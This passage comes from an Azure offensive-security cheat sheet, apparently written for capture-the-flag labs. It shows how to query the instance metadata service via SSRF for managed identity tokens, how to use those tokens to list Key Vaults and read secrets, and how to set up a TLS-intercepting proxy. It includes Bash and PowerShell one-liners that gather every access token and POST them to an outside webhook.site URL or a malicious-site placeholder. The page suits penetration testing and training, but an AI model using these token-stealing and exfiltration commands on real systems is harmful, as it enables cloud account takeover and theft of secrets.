--account-name $STORAGE_ACCOUNT_NAME \
--auth-mode login
az storage blob download \
--account-name $STORAGE_ACCOUNT_NAME \
--container-name flag \
--name flag.txt \
--file flag.txt \
--auth-mode login
cat flag.txt

SSRF

More Azure SSRF Information

Obtain tokens

Manual

HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"

Bash: Exfiltrate all the tokens

r="http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource="; h="Metadata:true"; json="{"; 
for res in "https://management.azure.com/" "https://graph.microsoft.com/" "https://vault.azure.net/" "https://storage.azure.com/"; do token=$(curl -s -f -H "$h" "${r}${res}" | sed -n 's/.*"access_token":"\([^"]*\)".*/\1/p'); json+="\"$res\":\"$token\","; done; json="${json%,}}"; curl -s -X POST -H "Content-Type: application/json" -d "$json" "https://webhook.site/9f90f8a5-2218-4da7-8810-4d9244530223"

PowerShell: Exfiltrate all the tokens

$h=@{Metadata='true'};$u='http://169.254.169.254/metadata/identity/oauth2/token';$v='2018-02-01';$r=@('https://management.azure.com/','https://graph.microsoft.com/','https://vault.azure.net/','https://storage.azure.com/');$tokens=@{};$r|%{$tokens[$_]=((Invoke-RestMethod -Uri "$u`?api-version=$v&resource=$_" -Headers $h -Method Get).access_token)};Invoke-WebRequest -Uri "https://<MALICIOUS_WEBSITE>/exfil" -Method POST -Body ($tokens|ConvertTo-Json) -ContentType 'application/json'

Azure App & Functions Services & Automation Accounts

From the env you can get the values of IDENTITY_HEADER and IDENTITY_ENDPOINT. That you can use to gather a token to speak with the metadata server.

TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')

Bash

Examples:

Curl

# Obtain a token 
ACCESS_TOKEN=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | jq -r .access_token)

# Perform a request to the Azure API
curl -s -X GET "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Compute/virtualMachines/$VM_NAME?api-version=2023-03-01"  -H "Authorization: Bearer $ACCESS_TOKEN" | jq .identity

Wget

# Obtain a token
TOKEN=$(wget -qO- --header "X-IDENTITY-HEADER: $IDENTITY_HEADER" "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2019-08-01" | python3 -c 'import json,sys; print(json.load(sys.stdin)["access_token"])')


wget -qO- --header "Authorization: Bearer $TOKEN" "https://$VAULT_NAME.vault.azure.net/secrets/$SECRET_NAME?api-version=2016-10-01"

PowerShell

Examples

$armToken = Invoke-RestMethod `
  -Headers @{Metadata="true"} `
  -Method GET `
  -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Verify the token was received
echo $armToken.access_token

# 1. Grab the subscription ID from the instance metadata
$instanceInfo = Invoke-RestMethod -Headers @{Metadata="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
$subId = $instanceInfo.compute.subscriptionId

# 2. Define the ARM API endpoint for Key Vaults
$uri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.KeyVault/vaults?api-version=2023-07-01"

# 3. Query the endpoint
$headers = @{Authorization = "Bearer $($armToken.access_token)"}
$vaults = Invoke-RestMethod -Method GET -Headers $headers -Uri $uri

# 4. Display the results cleanly
$vaults.value | Select-Object name, resourceGroup, location

$token = Invoke-RestMethod `
  -Headers @{Metadata="true"} `
  -Method GET `
  -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"
echo "ACCESS_TOKEN=$($token.access_token)"

$secrets = Invoke-RestMethod -Method GET -Headers @{Authorization = "Bearer $($token.access_token)"} -Uri "https://$($vaults.value.name).vault.azure.net/secrets?api-version=7.4"
$flagName = ($secrets.value | Where-Object { $_.id -match "flag" }).id
echo "FLAG_URI=$($flagName)"
(Invoke-RestMethod -Headers @{"Authorization"="Bearer $($token.access_token)"} -URI "$($flagName)?api-version=7.4").value | Out-String

MiTM

wget http://127.0.0.1:8080/cert -O ~/Downloads/cacert.der
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM

export REQUESTS_CA_BUNDLE=/home/test/Downloads/cacert.pem
export PYTHONWARNINGS="ignore:Unverified HTTPS request"
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
export HTTPS_PROXY="http://127.0.0.1:8080"
export HTTP_PROXY="http://127.0.0.1:8080"

Tools

azure-cli-mitm: Proxy to intercept Azure CLI REST communications and append or modify Authorization Bearer tokens per Azure service domain.
AzurePEAS: Enumerates the principals permissions within your Azure and Entra ID environments, with a special focus on detecting privilege escalation pathways and identifying potential security risks.
CloudSploit: Open-source project designed to allow detection of security risks in cloud infrastructure accounts.
Cloudfox: Helps you gain situational awareness in unfamiliar cloud environments.
Azure CLI
Azure PowerShell AZ Module
Microsoft Graph PowerShell
PowerShell In Linux
Install the sqlcmd and bcp

Last updated 17 days ago